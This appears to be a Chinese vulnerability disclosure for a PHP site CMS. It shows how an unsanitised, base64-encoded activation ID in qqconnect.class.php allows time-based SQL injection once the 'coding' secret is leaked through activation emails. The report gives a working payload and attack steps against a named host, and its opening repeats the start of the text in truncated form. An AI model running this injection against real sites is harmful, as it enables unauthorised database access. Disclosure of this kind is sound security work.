### 简要描述: ### 详细说明: index.php?M=qqconnect&C=mcert&id=MScgYW5kIHNsZWVwKDEwKSBhbmQgJzEnPScxfDE0OTA4MTQyfA== 测试 model/qqconnect.class.php function mcert_action(){ $id=$_GET['id']; $arr=@explode("|",base64_decode($id));//解码 if($id && is_array($arr) && $arr[0] && $arr[2]==$this->config['coding']){//主要看coding 是配置文件里面的 默认是空 如果修改 #echo "`email_status`='1'","`uid`='".$arr[0]."'"; $nid=$this->obj->DB_update_all("member","`email_status`='1'","`uid`='".$arr[0]."'");//带入查询 $nid?$this->obj->ACT_msg($this->config['sy_weburl']."/index.php?M=login&usertype=1","激活成功"):$this->obj->ACT_msg($this->config['sy_weburl'],"激活失败,联系管理员认证"); }else{ $this->obj->ACT_msg($this->config['sy_weburl'],"非法操作!","2"); } } 如果网站修改了coding的情况下 model/sendcert.class.php function sendcert_action() { extract($_POST); if(md5($_POST["authcode"])!=$_SESSION[authcode]){ $this->obj->ACT_msg("index.php?M=forgetpw","验证码错误","2"); } $info = $this->obj->DB_select_once("member","`username`='$username'","`uid`,`email_status`,`email`");...
### 简要描述: ### 详细说明: index.php?M=qqconnect&C=mcert&id=MScgYW5kIHNsZWVwKDEwKSBhbmQgJzEnPScxfDE0OTA4MTQyfA== 测试 model/qqconnect.class.php function mcert_action(){ $id=$_GET['id']; $arr=@explode("|",base64_decode($id));//解码 if($id && is_array($arr) && $arr[0] && $arr[2]==$this->config['coding']){//主要看coding 是配置文件里面的 默认是空 如果修改 #echo "`email_status`='1'","`uid`='".$arr[0]."'"; $nid=$this->obj->DB_update_all("member","`email_status`='1'","`uid`='".$arr[0]."'");//带入查询 $nid?$this->obj->ACT_msg($this->config['sy_weburl']."/index.php?M=login&usertype=1","激活成功"):$this->obj->ACT_msg($this->config['sy_weburl'],"激活失败,联系管理员认证"); }else{ $this->obj->ACT_msg($this->config['sy_weburl'],"非法操作!","2"); } } 如果网站修改了coding的情况下 model/sendcert.class.php function sendcert_action() { extract($_POST); if(md5($_POST["authcode"])!=$_SESSION[authcode]){ $this->obj->ACT_msg("index.php?M=forgetpw","验证码错误","2"); } $info = $this->obj->DB_select_once("member","`username`='$username'","`uid`,`email_status`,`email`"); if(is_array($info)) { if($info[email_status]=="1") { $this->obj->ACT_msg("index.php?M=login&usertype=1", $msg = "您的账户已经激活,请直接登录!", $st = 2, $tm = 3); } $randstr=rand(10000000,99999999); $base=base64_encode($info[uid]."|".$randstr."|".$this->config[coding]);//这里加入了coding发送给了用户 //echo $base; $data["type"]="cert"; $data["email"]=$info[email]; echo $this->config[sy_weburl]."/index.php?M=qqconnect&C=mcert&id=".$base; $data["url"]="<a href='".$this->config[sy_weburl]."/index.php?M=qqconnect&C=mcert&id=".$base."'>点击激活</a>"; $data["date"]=date("Y-m-d"); $this->send_msg_email($data); $this->obj->ACT_msg("index.php?M=sendcert", $msg = "激活邮件已经发送到您的邮箱!", $st = 2, $tm = 3); }else{ $this->obj->ACT_msg("index.php?M=login", $msg = "对不起!没有该用户!", $st = 2, $tm = 3); } } ### 漏洞证明: 这样我们构造攻击流程 1 注册用户 2 找回密码 打开找回密码页面获取一个验证码 然后 打开xx.com/index.php?M=sendcert&C=sendcert POST提交 authcode=验证码&username=注册用户名 3 查看邮箱 解密base内容 获取coding 4 构造exp进行注入 http://test.khjyw.net/index.php?M=qqconnect&C=mcert&id=MScgYW5kIHNsZWVwKDEwKSBhbmQgJzEnPScxfDE0OTA4MTQyfA== 其中base部分解码为 1' and sleep(10) and '1'='1|14908142| 进行延时注入
